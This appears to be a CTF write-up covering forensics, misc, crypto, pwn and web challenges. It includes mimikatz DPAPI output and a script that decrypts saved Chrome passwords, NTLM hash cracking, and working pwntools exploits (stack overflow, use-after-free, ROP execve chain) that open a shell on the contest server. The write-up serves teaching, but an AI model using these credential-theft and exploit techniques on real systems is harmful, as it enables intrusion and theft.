Forensics

Reborn as a Police Officer (重生之我是一名警察)

```shell
┌──(kali㉿kali)-[~/Desktop/volatility-master]
└─$ sha256sum windows7disk.E01
e0d680e535d8260ee1f32bdc7ea8253bff6f6ea365fafb60a996749583dbbdec  windows7disk.E01
```

flag:e0d680e535d8260ee1f32bdc7ea8253bff6f6ea365fafb60a996749583dbbdec

task1

The .E01 image can be loaded and analysed with Autopsy.

flag:WIN-49I0SNRJAMF

task2

The Nox Android emulator (夜神模拟器) is installed under C:/Program Files (x86)/Nox; its installation date is 2021-05-03.

flag:夜神模拟器2021年05月03日

task3

The LastLoggedOnUser value under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI holds the user name of the last account that logged on.

flag:poiuy

task4

The InstallDate value under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion holds it:

```text
InstallDate    REG_DWORD    0x608fd40c (1620038668)
```

InstallDate is a Unix timestamp (seconds since 1970-01-01 00:00:00 UTC). 1620038668 is 2021-05-03 10:44:28 UTC; in UTC+8 (China Standard Time), which is what the accepted answer uses, that is 2021-05-03 18:44:28.

flag:2021-05-03 18:44:28

task5

C:/Users/poiuy/Documents/ holds two BitLocker-encrypted virtual disk files, my.vhd and my1.vhd.

flag:my.vhd/my1.vhd

task6

Same registry key as task 4: the CurrentVersion value is the OS version number (6.1 is Windows 7 / Server 2008 R2).

```text
CurrentVersion    REG_SZ    6.1
```

flag:6.1

task7

Decrypt the user's DPAPI master key with mimikatz, using the SID from task 9 and the logon password from task 11:

```text
mimikatz # dpapi::masterkey /in:C:\Users\A1\Desktop\5eac26eb-b4cc-49b9-90d0-1c07274e301a /sid:S-1-5-21-435394657-638363951-1066549375-1000 /password:09876543
**MASTERKEYS**
dwVersion : 00000002 - 2
szGuid : {5eac26eb-b4cc-49b9-90d0-1c07274e301a}
dwFlags : 00000005 - 5
dwMasterKeyLen : 000000b0 - 176
dwBackupKeyLen : 00000090 - 144
dwCredHistLen : 00000014 - 20
dwDomainKeyLen : 00000000 - 0
[masterkey]
**MASTERKEY**
dwVersion : 00000002 - 2
salt : 9fc1803c3a7a9281a30fdc0e3e3d50a9
rounds : 000043f8 - 17400
algHash : 0000800e - 32782 (CALG_SHA_512)
algCrypt : 00006610 - 26128 (CALG_AES_256)
pbKey : 9076e1cf7033643553818deecadaafbf689ceddb2c082ca01f9acb06195152d06316fd2bbc5fea3bcd3fc94d166957ad2d6bb9fd94658d8696460db05778a8fef87313f19cb3d9a4d2cb688f315289b5ca1f0ef2b610948c7db8c1da9e8cfdfaba6879fe4a485ed30cf7a066a556922c58882d314ef6bf547741bfc45e515c87d71f39f9299bf4c178b8523337fe22ec

[backupkey]
**MASTERKEY**
dwVersion : 00000002 - 2
salt : ddd6b86170410289c16fb878a83cc719
rounds : 000043f8 - 17400
algHash : 0000800e - 32782 (CALG_SHA_512)
algCrypt : 00006610 - 26128 (CALG_AES_256)
pbKey : 248d303dd81e117ac3597aad02c7d2b0aad56e8acad7e350e323f1ffa4fbcc0c62045c57e58e96019317ecc6f5558d03b3da4a64925fa67a57e0994876e50c530c5cff34932492c13097b11a1a44331aeb276fd922cafd30ed537802e686c1275274ec11eaadcdedf4d803f001e2608f

[credhist]
**CREDHIST INFO**
dwVersion : 00000003 - 3
guid : {e872e171-99e7-47f8-882f-743eda526c2c}


[masterkey] with password: 09876543 (normal user)
key : 8ec14895e66277e735013b5793f00747faf5e4ca060b6a2715f94ddb8967c2a86a785bd7c690f4f5fc6e17e8481ad229986c99fc2955c469638c88386507163f
sha1: cd6c4b6f5f8c5d99a127bcd28a9efb17713a8107
```

Then decrypt the DPAPI blob that wraps Chrome's AES key (guidMasterKey in the blob is the master key just recovered; the unwrapped key is written to aes.dec):

```text
mimikatz # dpapi::blob /masterkey:8ec14895e66277e735013b5793f00747faf5e4ca060b6a2715f94ddb8967c2a86a785bd7c690f4f5fc6e17e8481ad229986c99fc2955c469638c88386507163f /in:"C:\Users\admin\Desktop\dec_data" /out:aes.dec
**BLOB**
dwVersion : 00000001 - 1
guidProvider : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
dwMasterKeyVersion : 00000001 - 1
guidMasterKey : {5eac26eb-b4cc-49b9-90d0-1c07274e301a}
dwFlags : 00000000 - 0 ()
dwDescriptionLen : 00000002 - 2
szDescription :
algCrypt : 00006610 - 26128 (CALG_AES_256)
dwAlgCryptLen : 00000100 - 256
dwSaltLen : 00000020 - 32
pbSalt : 56e7987655d247c884ba7824c8572e30959a7b95b8fcbd1bfbbbe26eb319cf9a
dwHmacKeyLen : 00000000 - 0
pbHmackKey :
algHash : 0000800e - 32782 (CALG_SHA_512)
dwAlgHashLen : 00000200 - 512
dwHmac2KeyLen : 00000020 - 32
pbHmack2Key : cdf3043a77b379336e10fa224971778e2dcac8e5e0100a2b3917f190dbba5e00
dwDataLen : 00000030 - 48
pbData : 24dc191e5500725448bf99be0e527d8d3975c0a9e7ad58699d72adbff65929a6656794992051f155d024a8038958ed93
dwSignLen : 00000040 - 64
pbSign : 7403ac411aee180592fed189514c0197fb2583eb113a7314ec7b384397159f92909e8f32ad30944e8f80a329d806e807716286afc6fad65c4d31cdda98ab012f

* masterkey : 8ec14895e66277e735013b5793f00747faf5e4ca060b6a2715f94ddb8967c2a86a785bd7c690f4f5fc6e17e8481ad229986c99fc2955c469638c88386507163f
description :
Write to file 'aes.dec' is OK
```

Decrypt the entries in Chrome's Login Data database with a Chrome password-decryption script from GitHub:

```python
import sqlite3
from Cryptodome.Cipher import AES   # pycryptodomex


def get_secret_key():
    # AES-256 key unwrapped from the DPAPI blob by mimikatz (dpapi::blob /out:aes.dec)
    with open('aes.dec', 'rb') as f:
        return f.read()


def decrypt_payload(cipher, payload):
    return cipher.decrypt(payload)


def generate_cipher(aes_key, iv):
    return AES.new(aes_key, AES.MODE_GCM, iv)


def decrypt_password(ciphertext, secret_key):
    # Chrome >= 80 layout: b'v10' | 12-byte GCM nonce | ciphertext | 16-byte GCM tag
    try:
        initialisation_vector = ciphertext[3:15]
        encrypted_password = ciphertext[15:-16]
        cipher = generate_cipher(secret_key, initialisation_vector)
        decrypted_pass = decrypt_payload(cipher, encrypted_password)
        return decrypted_pass.decode()
    except Exception as e:
        print("%s" % str(e))
        print("[ERR] Unable to decrypt, Chrome version <80 not supported. Please check.")
        return ""


def get_db_connection(chrome_path_login_db):
    try:
        return sqlite3.connect(chrome_path_login_db)
    except Exception as e:
        print("%s" % str(e))
        print("[ERR] Chrome database cannot be found")
        return None


if __name__ == '__main__':
    secret_key = get_secret_key()
    # "Login Data" SQLite file exported from the image
    chrome_path_login_db = r"C:\Users\triblade\Desktop\御宛杯\AppData\Local\Google\Chrome\User Data\Default\Login Data"
    conn = get_db_connection(chrome_path_login_db)
    if secret_key and conn:
        cursor = conn.cursor()
        cursor.execute("SELECT action_url, username_value, password_value FROM logins")
        for index, login in enumerate(cursor.fetchall()):
            url, username, ciphertext = login
            if url and username and ciphertext:
                decrypted_password = decrypt_password(ciphertext, secret_key)
                print("Sequence: %d" % index)
                print("URL: %s\nUser Name: %s\nPassword: %s\n" % (url, username, decrypted_password))
                print("*" * 50)
        cursor.close()
        conn.close()
```

Account and password recovered:

```text
Sequence: 0
URL: https://www.baidu.com/
User Name: test
Password: test@test2021.com

**************************************************
```

flag:https://www.baidu.com/+test+test@test2021.com
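As an added example (not part of the writeup), the Python below covers the step the mimikatz transcripts above leave implicit: where `dec_data` comes from and how to tell which master key file it needs. Chrome 80+ on Windows stores its AES-256 key base64-encoded in `Local State` under `os_crypt.encrypted_key`, prefixed with the literal bytes `DPAPI`; the rest is a DPAPI blob whose `guidMasterKey` names the file under `%APPDATA%\Microsoft\Protect\<SID>\` that `dpapi::masterkey` has to decrypt (here {5eac26eb-...}, as in the transcript). The `Local State` document and the blob payload are constructed from the GUIDs printed above; that the writeup's `dec_data` is exactly this stripped key is my assumption, supported by the matching `guidMasterKey` and the 48-byte `pbData` (a 32-byte key padded to 48 bytes by DPAPI's AES-CBC).

```python
import base64
import json
import struct
import uuid

# GUIDs taken from the mimikatz output above
DPAPI_PROVIDER_GUID = "df9d8cd0-1501-11d1-8c7a-00c04fc297eb"   # standard DPAPI provider
MASTERKEY_GUID = "5eac26eb-b4cc-49b9-90d0-1c07274e301a"        # this user's master key
CHROME_PREFIX = b"DPAPI"                                       # Chrome's os_crypt marker


def build_sample_blob(masterkey_guid: str, payload: bytes = b"\x00" * 48) -> bytes:
    """Constructed stand-in for a DPAPI blob: the real fixed header layout
    (the fields mimikatz prints first) followed by dummy payload bytes."""
    hdr = struct.pack("<I", 1)                                # dwVersion
    hdr += uuid.UUID(DPAPI_PROVIDER_GUID).bytes_le            # guidProvider (little-endian GUID)
    hdr += struct.pack("<I", 1)                               # dwMasterKeyVersion
    hdr += uuid.UUID(masterkey_guid).bytes_le                 # guidMasterKey
    hdr += struct.pack("<II", 0, 2)                           # dwFlags, dwDescriptionLen
    hdr += b"\x00\x00"                                        # szDescription: empty UTF-16 string
    return hdr + payload                                      # algCrypt ... pbSign not modelled


# Constructed "Local State" document (only the key Chrome's os_crypt reads)
SAMPLE_LOCAL_STATE = json.dumps({
    "os_crypt": {
        "encrypted_key": base64.b64encode(CHROME_PREFIX + build_sample_blob(MASTERKEY_GUID)).decode()
    }
})


def extract_dpapi_blob(local_state_json: str) -> bytes:
    """Return the raw DPAPI blob that wraps Chrome's AES key, i.e. what
    mimikatz dpapi::blob /in: expects (the writeup's dec_data, assumed)."""
    enc = base64.b64decode(json.loads(local_state_json)["os_crypt"]["encrypted_key"])
    if not enc.startswith(CHROME_PREFIX):
        raise ValueError("encrypted_key lacks the DPAPI prefix: not a Chrome 80+ Local State")
    return enc[len(CHROME_PREFIX):]


def parse_blob_header(blob: bytes) -> dict:
    """Parse the fixed leading fields of a DPAPI blob to learn which master key
    (file %APPDATA%\\Microsoft\\Protect\\<SID>\\<guidMasterKey>) can unwrap it."""
    version, = struct.unpack_from("<I", blob, 0)
    provider = uuid.UUID(bytes_le=blob[4:20])
    mk_version, = struct.unpack_from("<I", blob, 20)
    masterkey = uuid.UUID(bytes_le=blob[24:40])
    flags, desc_len = struct.unpack_from("<II", blob, 40)
    return {
        "version": version,
        "provider": str(provider),
        "masterkey_version": mk_version,
        "masterkey_guid": str(masterkey),
        "flags": flags,
        "description_len": desc_len,
    }


def split_v10_blob(password_value: bytes) -> dict:
    """Split a Chrome 80+ password_value into its AES-256-GCM parts:
    b'v10' | 12-byte nonce | ciphertext | 16-byte authentication tag."""
    if not password_value.startswith(b"v10"):
        raise ValueError("not a v10 blob: pre-Chrome-80 entries are plain DPAPI blobs")
    if len(password_value) < 3 + 12 + 16:
        raise ValueError("blob too short to hold nonce and tag")
    return {
        "nonce": password_value[3:15],
        "ciphertext": password_value[15:-16],
        "tag": password_value[-16:],
    }


if __name__ == "__main__":
    blob = extract_dpapi_blob(SAMPLE_LOCAL_STATE)
    print(parse_blob_header(blob))
    print(split_v10_blob(b"v10" + bytes(12) + b"\xaa" * 20 + bytes(16)))
```

The `tag` that `split_v10_blob` returns is what the script above discards: it calls `decrypt` and never checks the GCM tag, so a wrong `aes.dec` yields silent garbage rather than an error. With pycryptodome, `cipher.decrypt_and_verify(ciphertext, tag)` makes a key mismatch fail loudly.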

task8

Image size:

```text
Size (Bytes)    32212254720
```

(32212254720 bytes is exactly 30 GiB.)

flag:32212254720

task9

Enumerating HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList gives the SID of user "poiuy":

S-1-5-21-435394657-638363951-1066549375-1000

flag:S-1-5-21-435394657-638363951-1066549375-1000

task10

Searching Recent Documents in Autopsy turns up two BitLocker recovery-key shortcuts:

BitLocker 恢复密钥 666E6292-906B-4A9B-9167-4DB146123BAD.txt.lnk

BitLocker 恢复密钥 DC6BA222-5699-43EA-A3A0-FFAA4A57E6F7.txt.lnk

Trying both, the first one is accepted as the flag.

flag:666E6292-906B-4A9B-9167-4DB146123BAD.txt

task11

Export the SYSTEM and SAM hives from C:\Windows\System32\config\ and extract the NT hash with SAMInside: 7434F2F2B553FBF38B85C25BB4A0E138

Looking the hash up as NTLM on https://cmd5.com/ gives the password: 09876543

flag:09876543

MISC

Whoa, a Hacker (我敲,黑客)

Sum of the primes between 100 and 1000: 75067

Extracting gives an image; opening it in 010 Editor shows base64-encoded image data appended after the end of the picture. Decoding that to an image yields a QR code.

Scanning the QR code gives the flag: flag{asdf%^&*ghjkl}

List of file signatures

```python
def flip_bytes(input_file, output_file):
    with open(input_file, 'rb') as f:
        data = f.read()

    # Reverse every 4-byte word: the file was stored with each dword byte-swapped
    # (a JPEG header FF D8 FF E0 would show up as E0 FF D8 FF)
    flipped_data = b''.join([data[i:i + 4][::-1] for i in range(0, len(data), 4)])

    with open(output_file, 'wb') as f:
        f.write(flipped_data)


input_file = 'fl4g.jpeg'
output_file = 'flag.jpeg'
flip_bytes(input_file, output_file)
```

flag{byt3_sw4p}

Can This Even Run? (这能执行吗?)

The program checks for two command-line arguments, USERNAME and PASSWORD.

Running program.exe ALDI 384 from the command prompt prints a base64-encoded image; decoding it to an image gives the flag:

flag{Arm0uR_pPTi4}

Piece My Memories Back Together (把回忆拼好给你)

XOR the two images together:

CTF{I_L0V3_PYTH0N}

Piece My Memories Back Together 2.0 (把回忆拼好给你2.0)

Stitching the image strips back together reveals hex ASCII codes: 66 6c 61 67 7b 74 68 33 5f 4b 47 42 5f 6c 30 76 33 73 5f 43 54 46 7d

```python
import os
from PIL import Image

input_folder = r".\confetti"
output_file = r".\confetti\a.png"

# Each i.png is one 500-pixel-wide strip of the original picture; paste strip i at row i
result = Image.new('RGB', (500, 500))

for i in range(500):
    filename = f"{i}.png"
    filepath = os.path.join(input_folder, filename)

    if os.path.exists(filepath):
        img = Image.open(filepath)
        result.paste(img, (0, i))
    else:
        print(f"Warning: {filename} not found")

result.save(output_file)
print(f"Combined image saved as {output_file}")
```

The corresponding string: flag{th3_KGB_l0v3s_CTF}

Nobody Actually Unzips These One by One, Right? (不会真有人一个一个解压缩吧?)

```python
import os
import subprocess


def extract_zip(zip_file, password, output_dir='.'):
    # 7z must be on PATH; -y answers "yes" to overwrite prompts (password.txt is replaced each round)
    command = ['7z', 'x', '-p{}'.format(password), zip_file, '-o{}'.format(output_dir), '-y']
    result = subprocess.run(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE)

    if result.returncode == 0:
        print(f"{zip_file} extracted successfully!")
        return True
    else:
        print(f"Failed to extract {zip_file}: {result.stderr.decode()}")
        return False


def get_password(password_file):
    with open(password_file, 'r') as f:
        return f.read().strip()


def delete_file(file_path):
    try:
        os.remove(file_path)
        print(f"{file_path} deleted.")
    except OSError as e:
        print(f"Could not delete {file_path}: {e}")


def main():
    base_dir = '.'
    # password.txt for zip-25000.zip must already be present next to it
    password_file = os.path.join(base_dir, 'password.txt')

    # Each zip-N.zip yields zip-(N-1).zip plus a fresh password.txt for it,
    # so walk the chain from 25000 down to 1
    for i in range(25000, 0, -1):
        zip_path = os.path.join(base_dir, f"zip-{i}.zip")
        if not os.path.exists(password_file):
            print(f"Password file not found: {password_file}")
            break

        password = get_password(password_file)
        if not extract_zip(zip_path, password, base_dir):
            break

        # Remove the archive just opened so the working directory stays small
        if i < 25000:
            delete_file(zip_path)


if __name__ == "__main__":
    main()
```

TCP1P{1_TH1NK_U_G00D_4T_SCR1PT1N9_botanbell_1s_h3r3^_^}

Just Sign In, It's Easy (来签个到吧,包简单的)

Opening the image in StegSolve, the Red plane 0 view shows the string: ==QTh9lMx8Fd08VZt9FdFNTb

Base64 padding ('=') normally sits at the end, so the string has been reversed. Reversing it gives bTNFdF9tZV80dF8xMl9hTQ==, which Base64-decodes to the flag: flag{m3Et_me_4t_12_aM}

What Is This? A Config File? (这是?配置文件?)

https://github.com/HyperSine/how-does-MobaXterm-encrypt-password

```shell
python3 MobaXtermCipher.py dec -sp 525710918580 DLulatnJIPtEF/EMGfysL2F58R4dfQIbQhzwuNqL
```

(-sp takes the SessionP value saved in MobaXterm's configuration; the last argument is the stored encrypted password.)

Come OSINT Me_1 (快来社我_1)

Baidu reverse image search identifies the scenic spot: Yuntai Mountain (云台山)

flag{yuntaishan}

Come OSINT Me_2 (快来社我_2)

Search for the quoted text: "This beast runs on 53 qubits and recently achieved 'quantum supremacy'. We believe you know 'its' name."

Search result: on 24 October 2019, in Nature's 150th-anniversary issue, Google announced a "key milestone" in quantum computing: its latest Sycamore processor with 53 superconducting qubits.

flag{Sycamore}

Come OSINT Me_3 (快来社我_3)

Google Maps:

Rosenau Bros Kiddie Kloes Historic Factory

362 W Patterson St, Lansford, PA 18232 (Lansford lies in Carbon County)

flag{Carbon_County}

Crypto

Ez_RSA

Solved with Vieta's formulas for a quadratic: not_phi was generated as (p+3)(q+3) = n + 3(p+q) + 9, so p+q = (not_phi - n - 9)/3, and p, q are the two roots of x² - (p+q)x + n = 0.

```python
from sympy import symbols, Eq, solve
from Crypto.Util.number import long_to_bytes, inverse

e = 65537
n = 97003850850040952844587475437460149663654189201387855024040346139584151510739356074369121470184325592356345533719425034732087985768855378103846599571920819607004695644591231034028585872350731819641620530992562020648337983877420861817386470051601404728847162770341340709409331924083906577836343671751461800641
not_phi = 97003850850040952844587475437460149663654189201387855024040346139584151510739356074369121470184325592356345533719425034732087985768855378103846599571920879777663593679859238788800713921207765284450610197129070615800306033898076058599156162495376307988618628754841062502962329450466110589828082689175911189124
c = 31648100885161830950110219017754314322263944256316235264449880700096434928815116220641135916147173391572115158841069491300446654777805507405971457255928030870596026057567702034717781270729367309989423695505283185674132049530706799948557972728933012591037486370001542782395573887256404792664989124714420821017

# not_phi = (p+3)(q+3) = n + 3(p+q) + 9
p_plus_q = (not_phi - n - 9) // 3

# p and q are the roots of x^2 - (p+q)x + n = 0
x = symbols('x')
eq1 = Eq(x ** 2 - p_plus_q * x + n, 0)
solutions = solve(eq1)

p = int(solutions[0])
q = int(solutions[1])

assert p * q == n

phi_n = (p - 1) * (q - 1)

d = inverse(e, phi_n)

m = pow(c, d, n)

flag = long_to_bytes(m)
print(flag)
```

NYSEC{th1s_is_fake_fl4ggg}
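An added example, not the writeup's code: the same Vieta recovery done with an exact integer square root (`math.isqrt`) instead of sympy, with the checks a solver wants before trusting the result (the leak really has the form (p+k)(q+k), the discriminant really is a perfect square, the roots multiply back to n), so a wrong guess about how the leak was built fails loudly instead of producing garbage. The toy values p = 11, q = 13 are constructed; the challenge values in the `__main__` block are the ones printed above.

```python
from math import isqrt


def sum_from_shifted_product(n: int, leak: int, k: int = 3) -> int:
    """n = p*q and leak = (p+k)(q+k) = n + k(p+q) + k^2  ->  p+q = (leak - n - k^2) / k."""
    num = leak - n - k * k
    if num <= 0 or num % k:
        raise ValueError("leak does not have the form (p+k)(q+k) for this k")
    return num // k


def split_from_sum(n: int, s: int) -> tuple:
    """Vieta: p and q are the roots of x^2 - s*x + n = 0,
    so p, q = (s -/+ sqrt(s^2 - 4n)) / 2, computed exactly on integers."""
    disc = s * s - 4 * n
    if disc < 0:
        raise ValueError("s^2 < 4n: s cannot be p+q")
    r = isqrt(disc)
    if r * r != disc or (s - r) % 2:
        raise ValueError("discriminant is not a perfect square: s is not p+q for this n")
    p, q = (s - r) // 2, (s + r) // 2
    if p * q != n:
        raise ValueError("roots do not multiply back to n")
    return p, q


def rsa_decrypt(n: int, e: int, c: int, p: int, q: int) -> bytes:
    """Textbook RSA decryption once the factors are known."""
    phi = (p - 1) * (q - 1)
    d = pow(e, -1, phi)                       # modular inverse, Python >= 3.8
    m = pow(c, d, n)
    return m.to_bytes((m.bit_length() + 7) // 8, "big")


def solve(n: int, e: int, c: int, leak: int, k: int = 3) -> bytes:
    """Full chain: leak -> p+q -> (p, q) -> plaintext bytes."""
    p, q = split_from_sum(n, sum_from_shifted_product(n, leak, k))
    return rsa_decrypt(n, e, c, p, q)


if __name__ == "__main__":
    # Constructed toy instance: p = 11, q = 13, so n = 143 and (p+3)(q+3) = 14 * 16 = 224
    print(split_from_sum(143, sum_from_shifted_product(143, 224)))   # (11, 13)

    # Challenge values from the writeup above
    e = 65537
    n = 97003850850040952844587475437460149663654189201387855024040346139584151510739356074369121470184325592356345533719425034732087985768855378103846599571920819607004695644591231034028585872350731819641620530992562020648337983877420861817386470051601404728847162770341340709409331924083906577836343671751461800641
    not_phi = 97003850850040952844587475437460149663654189201387855024040346139584151510739356074369121470184325592356345533719425034732087985768855378103846599571920879777663593679859238788800713921207765284450610197129070615800306033898076058599156162495376307988618628754841062502962329450466110589828082689175911189124
    c = 31648100885161830950110219017754314322263944256316235264449880700096434928815116220641135916147173391572115158841069491300446654777805507405971457255928030870596026057567702034717781270729367309989423695505283185674132049530706799948557972728933012591037486370001542782395573887256404792664989124714420821017
    print(solve(n, e, c, not_phi))
```

The `k` parameter is the generalisation: any leak of the shape (p+k)(q+k), or equivalently n + k(p+q) + k², gives p+q the same way, and the perfect-square check is what tells you whether your guess for k was right.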

babyRSA

When n itself is prime, φ(n) = n - 1, so d = e⁻¹ mod (n - 1) decrypts directly.

```python
from Crypto.Util.number import long_to_bytes

n = 115637526134331679471762036009650878098192794780919016407992307006285173707815313751816240676624074503522331069738896294029719406044031080434725863244230289442472213042373881987359484483724993562124890872771331854637024940624934390825956979717868136123264909166944848643274757372810254880211270034431901369477
e = 65537
c = 72569468275842451722615052490613164720057228162294356630723330346528174565283712551174610966405323053524552996358664532061010173928966858027707499839481744459379526297316423103302051818874023723931145765517543875769202293737186668733370788763540574136428757287404743954896068847733217295406897120557585899498
phi = n - 1   # n is prime


# modular inverse of a mod m (extended Euclid)
def modinv(a, m):
    m0 = m
    x0, x1 = 0, 1
    if m == 1:
        return 1
    while a > 1:
        q = a // m
        m, a = a % m, m
        x0, x1 = x1 - q * x0, x0
    return x1 + m0 if x1 < 0 else x1


# decrypt: d = e^-1 mod phi, m = c^d mod n
def decrypt(n, e, c, phi):
    d = modinv(e, phi)
    m = pow(c, d, n)
    return long_to_bytes(m)


m = decrypt(n, e, c, phi)

print("Flag:", m.decode())
```
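An added example (not the writeup's code): before leaning on φ(n) = n - 1 it is worth confirming that n really is (probably) prime, because for a two-prime modulus the same d would decrypt to garbage with no error. The Miller-Rabin test below is self-contained, and `rsa_decrypt_prime_modulus` refuses to proceed on a composite modulus. The small instance n = 1000003 (a prime) is constructed for illustration; the challenge values in `__main__` are the ones above.

```python
import random

_SMALL_PRIMES = [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37]


def is_probable_prime(n: int, extra_rounds: int = 16) -> bool:
    """Miller-Rabin: the first 12 primes as fixed witnesses (deterministic for
    n < 3.3e24) plus `extra_rounds` random witnesses for larger n."""
    if n < 2:
        return False
    for p in _SMALL_PRIMES:          # trial division also handles the small cases
        if n % p == 0:
            return n == p
    d, r = n - 1, 0                  # n - 1 = 2^r * d with d odd
    while d % 2 == 0:
        d //= 2
        r += 1
    witnesses = list(_SMALL_PRIMES) + [random.randrange(2, n - 1) for _ in range(extra_rounds)]
    for a in witnesses:
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False             # a is a witness that n is composite
    return True


def rsa_decrypt_prime_modulus(n: int, e: int, c: int) -> bytes:
    """Textbook RSA with a prime modulus: phi(n) = n - 1, so d = e^-1 mod (n - 1)."""
    if not is_probable_prime(n):
        raise ValueError("n is composite: phi(n) = n - 1 does not apply, factor n instead")
    d = pow(e, -1, n - 1)            # Python >= 3.8 modular inverse
    m = pow(c, d, n)
    return m.to_bytes((m.bit_length() + 7) // 8, "big")


if __name__ == "__main__":
    # Constructed small instance: 1000003 is prime, plaintext bytes b"AB" = 0x4142
    print(rsa_decrypt_prime_modulus(1000003, 65537, pow(0x4142, 65537, 1000003)))   # b'AB'

    # Challenge values from the writeup above
    n = 115637526134331679471762036009650878098192794780919016407992307006285173707815313751816240676624074503522331069738896294029719406044031080434725863244230289442472213042373881987359484483724993562124890872771331854637024940624934390825956979717868136123264909166944848643274757372810254880211270034431901369477
    e = 65537
    c = 72569468275842451722615052490613164720057228162294356630723330346528174565283712551174610966405323053524552996358664532061010173928966858027707499839481744459379526297316423103302051818874023723931145765517543875769202293737186668733370788763540574136428757287404743954896068847733217295406897120557585899498
    print(rsa_decrypt_prime_modulus(n, e, c))
```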

Pwn

netcat

Connecting with nc drops straight into a shell.

flag{57ce957a-dd2d-4b7d-933d-4a76701bfe71}

stack oooooooverflow!!!

```python
from pwn import *

context.log_level = 'debug'
p = remote("nysec.ctf.center", 35047)
# 0x14-byte buffer + 4-byte saved ebp, then the return address
payload = b"a" * (0x14 + 0x4) + p32(0x804846B)
p.sendline(payload)
sleep(2)
p.sendline(b"cat${IFS}flag")   # ${IFS} stands in for a space
p.interactive()
```

flag{e0837ec8-6470-4697-83a6-f4bdafc437fb[TEAM_HASH]}

Don't Touch My Notes!!! (不要动我的笔记!!!)

glibc version: 2.23-0ubuntu11.3, i386

Swap the dynamic loader:

```shell
patchelf --set-interpreter ./ld-2.23.so ./note
```

Swap libc:

```shell
patchelf --replace-needed libc.so.6 ./libc-2.23.so ./note
```

UAF (classic hacknote layout: each note is an 8-byte struct of a print-function pointer and a content pointer, and deleted notes stay in the array):

```python
from pwn import *

context.update(arch='i386', os='linux', log_level='debug')
p = remote("nysec.ctf.center", 35491)


def Add(size, content):
    p.sendlineafter(b"Your choice :", str(1))
    p.sendlineafter(b'Note size :', str(size))
    p.sendlineafter(b'Content :', content)


def Delete(idx):
    p.sendlineafter(b"Your choice :", str(2))
    p.sendlineafter(b'Index :', str(idx))


def Print(idx):
    p.sendlineafter(b"Your choice :", str(3))
    p.sendlineafter(b'Index :', str(idx))


magic = 0x00000000080488E2   # function to be called through the dangling note

# Two notes: their 8-byte structs go to the 16-byte fastbin, their 32-byte contents elsewhere
Add(32, b"aaaa")
Add(32, b"aabb")
Delete(0)
Delete(1)
# Adding an 8-byte note takes both freed struct chunks: the new struct reuses note 1's,
# and the 8-byte content buffer reuses note 0's old struct. Writing p32(magic) there
# overwrites note 0's print-function pointer
Add(8, p32(magic))
# Note 0 was freed but is still referenced (use-after-free): printing it calls magic
Print(0)

sleep(2)
p.sendline(b"cat${IFS}flag")

p.interactive()
```

flag{75c76361-fa50-4c1c-9f32-028e29f14905}

1por

The binary is statically linked, so ROPgadget can build a complete execve chain from its own gadgets:

```python
from pwn import *

context.update(arch='i386', os='linux', log_level='debug')

r = remote("nysec.ctf.center", 35492)

# 0x88-byte buffer + 4-byte saved ebp, then the chain starts at the return address
p = b'a' * (0x88 + 0x4)

# ROPgadget --binary ./rop1 --ropchain
# Write "/bin//sh\0" into .data (writable, at a fixed address in the static binary)
p += p32(0x080551ca) # pop edx ; ret
p += p32(0x080ef060) # @ .data
p += p32(0x080c28c6) # pop eax ; ret
p += b'/bin'
p += p32(0x0808ee3d) # mov dword ptr [edx], eax ; ret
p += p32(0x080551ca) # pop edx ; ret
p += p32(0x080ef064) # @ .data + 4
p += p32(0x080c28c6) # pop eax ; ret
p += b'//sh'
p += p32(0x0808ee3d) # mov dword ptr [edx], eax ; ret
p += p32(0x080551ca) # pop edx ; ret
p += p32(0x080ef068) # @ .data + 8
p += p32(0x080512c0) # xor eax, eax ; ret
p += p32(0x0808ee3d) # mov dword ptr [edx], eax ; ret
# execve(ebx = "/bin//sh", ecx = argv, edx = envp); ecx and edx point at the zero dword
p += p32(0x080481ec) # pop ebx ; ret
p += p32(0x080ef060) # @ .data
p += p32(0x080e3c2a) # pop ecx ; ret
p += p32(0x080ef068) # @ .data + 8
p += p32(0x080551ca) # pop edx ; ret
p += p32(0x080ef068) # @ .data + 8
p += p32(0x080512c0) # xor eax, eax ; ret

# eax = 11 = SYS_execve on i386
for _ in range(11):
    p += p32(0x0809a93f) # inc eax ; ret

p += p32(0x08049449) # int 0x80

r.sendline(p)

sleep(2)
r.sendline(b"cat${IFS}flag")

r.interactive()
```

Web

Sign-In Challenge~~ (来签个到吧~~)

The id parameter has to equal base64("henan") = aGVuYW4=:

http://nysec.ctf.center:35043/?id=aGVuYW4=

```php
<?php
error_reporting(0);
highlight_file(__FILE__);
if (!($_REQUEST["id"] == base64_encode("henan"))) {
    goto lklsgyy;
}
echo getenv("GZCTF_FLAG");
lklsgyy:
```

Dead Simple, One Shot (包简单,一把梭)

Start with directory enumeration:

```text
F:\gobuster_Windows_x86_64>gobuster.exe dir -u http://nysec.ctf.center:34405/ -w F:\gobuster_Windows_x86_64\Burp_Dir.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://nysec.ctf.center:34405/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: F:\gobuster_Windows_x86_64\Burp_Dir.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/0 (Status: 200) [Size: 931]
/captcha (Status: 500) [Size: 7332]
/Index (Status: 200) [Size: 931]
/Login (Status: 200) [Size: 880]
/register (Status: 200) [Size: 21]
/server-status (Status: 403) [Size: 284]
/static (Status: 301) [Size: 330] [--> http://nysec.ctf.center:34405/static/]
Progress: 2140 / 2140 (100.00%)
===============================================================
Finished
===============================================================
```

http://nysec.ctf.center:34405/captcha returns a framework error page that leaks the framework and version:

```html
<body>
<div class="echo">
</div>
<div class="exception">

<div class="info"><h1>页面错误!请稍后再试~</h1></div>

</div>



<div class="copyright">
<a title="官方网站" href="http://www.thinkphp.cn">ThinkPH</a>
<span>V5.0.23</span>
